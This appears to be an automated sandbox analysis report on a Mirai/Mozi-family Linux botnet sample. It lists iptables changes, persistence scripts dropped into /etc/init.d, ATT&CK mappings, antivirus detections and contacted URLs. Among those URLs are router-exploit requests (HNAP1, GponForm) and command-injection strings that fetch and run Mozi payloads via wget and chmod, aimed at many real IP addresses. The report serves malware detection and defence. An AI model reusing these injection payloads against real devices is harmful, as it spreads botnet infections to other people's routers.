                Source: /bin/sh (PID: 4763)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4785)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4815)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4819)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4838)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4866)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4896)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4915)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4939)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4966)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 4986)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4992)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5015)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5042)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5063)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5071)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5095)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5119)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5139)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5158)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5167)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5194)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5215)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5229)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5253)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5265)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT
                Source: /tmp/nT7K5GG5km (PID: 4627)Reads from proc file: /proc/statJump to behavior
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/nT7K5GG5km (PID: 4600)File written: /usr/networksJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
                Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Drops files in suspicious directoriesShow sources
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/S95baby.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/mountall.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/checkfs.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/umountnfs.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/mountkernfs.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/checkroot-bootclean.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/mountnfs-bootclean.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/bootmisc.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/checkroot.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/hwclock.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/hostname.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/mountdevsubfs.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/mountall-bootclean.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/init.d/mountnfs.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /usr/bin/gettext.shJump to dropped file
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /usr/sbin/alsa-info.shJump to dropped file
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 52478 -> 8443
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 53350 -> 8443
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 54390 -> 49152
                Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 54390
                Source: /tmp/nT7K5GG5km (PID: 4587)Queries kernel information via 'uname':
                Source: /tmp/nT7K5GG5km (PID: 4600)Queries kernel information via 'uname':
                Source: /tmp/nT7K5GG5km (PID: 4623)Queries kernel information via 'uname':
                Source: /sbin/modprobe (PID: 4639)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 5330)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 5349)Queries kernel information via 'uname':
                Source: kvm-test-1-run.sh.8.drBinary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
                Source: functions.sh0.8.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
                Source: kvm-test-1-run.sh.8.drBinary or memory string: kill -KILL $qemu_pid
                Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
                Source: kvm.sh.8.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_pid=$!
                Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                Source: functions.sh0.8.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
                Source: kvm-recheck-lock.sh.8.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                Source: kvm-test-1-run.sh.8.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
                Source: kvm.sh.8.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_append () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
                Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
                Source: functions.sh0.8.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
                Source: kvm-test-1-run.sh.8.drBinary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
                Source: kvm-test-1-run.sh.8.drBinary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
                Source: functions.sh0.8.drBinary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_args () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
                Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate -smp qemu argument.
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
                Source: functions.sh0.8.drBinary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
                Source: functions.sh0.8.drBinary or memory string: # Output arguments for the qemu "-append" string based on CPU type
                Source: kvm.sh.8.drBinary or memory string: --qemu-args|--qemu-arg)
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
                Source: functions.sh0.8.drBinary or memory string: echo $TORTURE_QEMU_CMD
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC=$2
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
                Source: kvm-test-1-run.sh.8.drBinary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
                Source: functions.sh0.8.drBinary or memory string: specify_qemu_cpus () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: vcpus=`identify_qemu_vcpus`
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-ppc64
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
                Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
                Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
                Source: functions.sh0.8.drBinary or memory string: # identify_boot_image qemu-cmd
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_ARG="$2"
                Source: kvm-recheck-rcu.sh.8.drBinary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_append qemu-cmd
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_vcpus () {
                Source: functions.sh0.8.drBinary or memory string: # qemu-args already contains "-smp".
                Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                Source: functions.sh0.8.drBinary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
                Source: functions.sh0.8.drBinary or memory string: echo Cannot figure out what qemu command to use! 1>&2
                Source: functions.sh0.8.drBinary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_vcpus
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$2"
                Source: functions.sh0.8.drBinary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_args qemu-cmd serial-file
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_CMD"
                Source: kvm.sh.8.drBinary or memory string: --qemu-cmd)
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args=$5
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate qemu -append arguments
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu builddir
                Source: functions.sh0.8.drBinary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
                Source: functions.sh0.8.drBinary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
                Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-i386
                Source: functions.sh0.8.drBinary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-x86_64
                Source: functions.sh0.8.drBinary or memory string: identify_qemu () {

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsCommand and Scripting Interpreter1.bash_profile and .bashrc1.bash_profile and .bashrc1Masquerading1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting12At (Linux)1At (Linux)1File and Directory Permissions Modification1Brute Force1Remote System Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)1Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 402069 Sample: nT7K5GG5km Startdate: 01/05/2021 Architecture: LINUX Score: 100 91 19.35.22.33, 52869 MIT-GATEWAYSUS United States 2->91 93 93.203.255.9, 23 DTAGInternetserviceprovideroperationsDE Germany 2->93 95 103 other IPs or domains 2->95 99 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->99 101 Antivirus detection for dropped file 2->101 103 Antivirus / Scanner detection for submitted sample 2->103 105 7 other signatures 2->105 12 nT7K5GG5km 2->12         started        14 upstart sh 2->14         started        16 upstart sh 2->16         started        18 upstart sh 2->18         started        signatures3 process4 process5 20 nT7K5GG5km 12->20         started        22 sh date 14->22         started        24 sh apport-checkreports 14->24         started        26 sh date 16->26         started        28 sh apport-gtk 16->28         started        30 sh date 18->30         started        32 sh apport-gtk 18->32         started        process6 34 nT7K5GG5km 20->34         started        file7 83 /usr/sbin/alsa-info.sh, ASCII 34->83 dropped 85 /usr/networks, ELF 34->85 dropped 87 /usr/bin/gettext.sh, ASCII 34->87 dropped 89 21 other malicious files 34->89 dropped 107 Sample tries to persist itself using /etc/profile 34->107 109 Drops files in suspicious directories 34->109 111 Sample reads /proc/mounts (often used for finding a writable filesystem) 34->111 113 Sample tries to persist itself using System V runlevels 34->113 38 nT7K5GG5km 34->38         started        41 nT7K5GG5km sh 34->41         started        43 nT7K5GG5km sh 34->43         started        45 30 other processes 34->45 signatures8 process9 signatures10 119 Opens /proc/net/* files useful for finding connected devices and routers 38->119 47 nT7K5GG5km sh 38->47         started        49 nT7K5GG5km sh 38->49         started        51 nT7K5GG5km sh 38->51         started        62 5 other processes 38->62 53 sh killall 41->53         started        56 sh iptables 43->56         started        58 sh iptables 45->58         started        60 sh iptables 45->60         started        64 21 other processes 45->64 process11 signatures12 66 sh iptables 47->66         started        69 sh iptables 49->69         started        71 sh iptables 51->71         started        115 Terminates several processes with shell command 'killall' 53->115 117 Executes the "iptables" command to insert, remove and/or manipulate rules 56->117 73 sh iptables 62->73         started        75 sh iptables 62->75         started        77 sh iptables 62->77         started        79 2 other processes 62->79 process13 signatures14 97 Executes the "iptables" command to insert, remove and/or manipulate rules 66->97 81 iptables modprobe 66->81         started        process15

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                nT7K5GG5km65%VirustotalBrowse
                nT7K5GG5km54%MetadefenderBrowse
                nT7K5GG5km69%ReversingLabsLinux.Trojan.Mirai
                nT7K5GG5km100%AviraLINUX/Mirai.lldau

                Dropped Files

                SourceDetectionScannerLabelLink
                /usr/networks100%AviraLINUX/Mirai.lldau
                /usr/networks54%MetadefenderBrowse
                /usr/networks69%ReversingLabsLinux.Trojan.Mirai

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://pastebin.ca)0%Avira URL Cloudsafe
                http://%s:%d/bin.sh;chmod0%Avira URL Cloudsafe
                http://13.109.201.46:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://112.125.239.197:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://%s:%d/Mozi.a;chmod0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;$0%Avira URL Cloudsafe
                http://3.22.17.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://46.249.83.253:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://154.3.84.96:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m0%Avira URL Cloudsafe
                http://www.alsa-project.org/cardinfo-db/0%Avira URL Cloudsafe
                http://210.190.146.92:80/HNAP1/0%Avira URL Cloudsafe
                http://114.204.63.176:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                http://%s:%d/bin.sh0%Avira URL Cloudsafe
                http://www.alsa-project.org/alsa-info.sh0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;0%Avira URL Cloudsafe
                http://123.110.194.55:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.a;sh$0%Avira URL Cloudsafe
                http://185.36.171.129:80/HNAP1/0%Avira URL Cloudsafe
                http://89.129.183.215:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://49.44.132.19:80/HNAP1/0%Avira URL Cloudsafe
                http://127.0.0.1:80/GponForm/diag_Form?images/0%Avira URL Cloudsafe
                http://45.148.37.237:80/HNAP1/0%Avira URL Cloudsafe
                http://184.86.117.97:80/HNAP1/0%Avira URL Cloudsafe
                http://166.88.13.234:80/HNAP1/0%Avira URL Cloudsafe
                http://127.0.0.1:8080/GponForm/diag_Form?images/0%Avira URL Cloudsafe
                http://104.124.230.135:80/HNAP1/0%Avira URL Cloudsafe
                http://81.196.113.75:80/HNAP1/0%Avira URL Cloudsafe
                http://204.232.228.51:80/HNAP1/0%Avira URL Cloudsafe
                http://127.0.0.10%Avira URL Cloudsafe
                http://www.alsa-project.org0%Avira URL Cloudsafe
                http://127.0.0.1sendcmd0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;/tmp/Mozi.m0%Avira URL Cloudsafe
                http://1.34.1.251:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://purenetworks.com/HNAP1/0%Avira URL Cloudsafe
                http://188.106.17.156:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://www.alsa-project.org.0%Avira URL Cloudsafe
                http://HTTP/1.10%Avira URL Cloudsafe
                http://147.46.176.166:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://179.40.62.87:80/HNAP1/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                dht.transmissionbt.com
                87.98.162.88
                truefalse
                  high
                  bttracker.acc.umu.se
                  130.239.18.159
                  truefalse
                    high
                    router.bittorrent.com
                    67.215.246.10
                    truefalse
                      high
                      router.utorrent.com
                      82.221.103.244
                      truefalse
                        high
                        bttracker.debian.org
                        unknown
                        unknownfalse
                          high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://13.109.201.46:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://112.125.239.197:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://3.22.17.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://46.249.83.253:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://154.3.84.96:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://210.190.146.92:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://114.204.63.176:49152/soap.cgi?service=WANIPConn1false
                          • Avira URL Cloud: safe
                          unknown
                          http://123.110.194.55:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://185.36.171.129:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://89.129.183.215:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://49.44.132.19:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://127.0.0.1:80/GponForm/diag_Form?images/true
                          • Avira URL Cloud: safe
                          unknown
                          http://45.148.37.237:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://184.86.117.97:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://166.88.13.234:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://127.0.0.1:8080/GponForm/diag_Form?images/true
                          • Avira URL Cloud: safe
                          unknown
                          http://104.124.230.135:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://81.196.113.75:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://204.232.228.51:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://1.34.1.251:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://188.106.17.156:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://147.46.176.166:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://179.40.62.87:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://pastebin.ca)alsa-info.sh0.8.drfalse
                          • Avira URL Cloud: safe
                          low
                          http://%s:%d/bin.sh;chmodnT7K5GG5kmtrue
                          • Avira URL Cloud: safe
                          low
                          http://%s:%d/Mozi.a;chmodnT7K5GG5kmfalse
                          • Avira URL Cloud: safe
                          low
                          http://%s:%d/Mozi.m;$nT7K5GG5kmfalse
                          • Avira URL Cloud: safe
                          low
                          http://schemas.xmlsoap.org/soap/envelope/nT7K5GG5kmfalse
                            high
                            http://www.pastebin.ca/upload.phpalsa-info.sh0.8.drfalse
                              high
                              http://%s:%d/Mozi.mnT7K5GG5kmfalse
                              • Avira URL Cloud: safe
                              low
                              http://www.alsa-project.org/cardinfo-db/alsa-info.sh0.8.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEYalsa-info.sh0.8.drfalse
                                high
                                http://%s:%d/bin.shnT7K5GG5kmtrue
                                • Avira URL Cloud: safe
                                low
                                http://www.alsa-project.org/alsa-info.shalsa-info.sh0.8.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://%s:%d/Mozi.m;nT7K5GG5kmfalse
                                • Avira URL Cloud: safe
                                low
                                http://%s:%d/Mozi.a;sh$nT7K5GG5kmfalse
                                • Avira URL Cloud: safe
                                low
                                http://www.pastebin.ca.alsa-info.sh0.8.drfalse
                                  high
                                  http://schemas.xmlsoap.org/soap/encoding/nT7K5GG5kmfalse
                                    high
                                    http://127.0.0.1nT7K5GG5kmfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://baidu.com/%s/%s/%d/%s/%s/%s/%s)nT7K5GG5kmfalse
                                      high
                                      http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/.config.8.drfalse
                                        high
                                        http://www.alsa-project.orgalsa-info.sh0.8.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://127.0.0.1sendcmdnT7K5GG5kmfalse
                                        • Avira URL Cloud: safe
                                        low
                                        http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblahalsa-info.sh0.8.drfalse
                                          high
                                          http://ipinfo.io/ipnT7K5GG5kmfalse
                                            high
                                            http://%s:%d/Mozi.m;/tmp/Mozi.mnT7K5GG5kmfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.pastebin.caalsa-info.sh0.8.drfalse
                                              high
                                              http://purenetworks.com/HNAP1/nT7K5GG5kmfalse
                                              • Avira URL Cloud: safe
                                              unknown
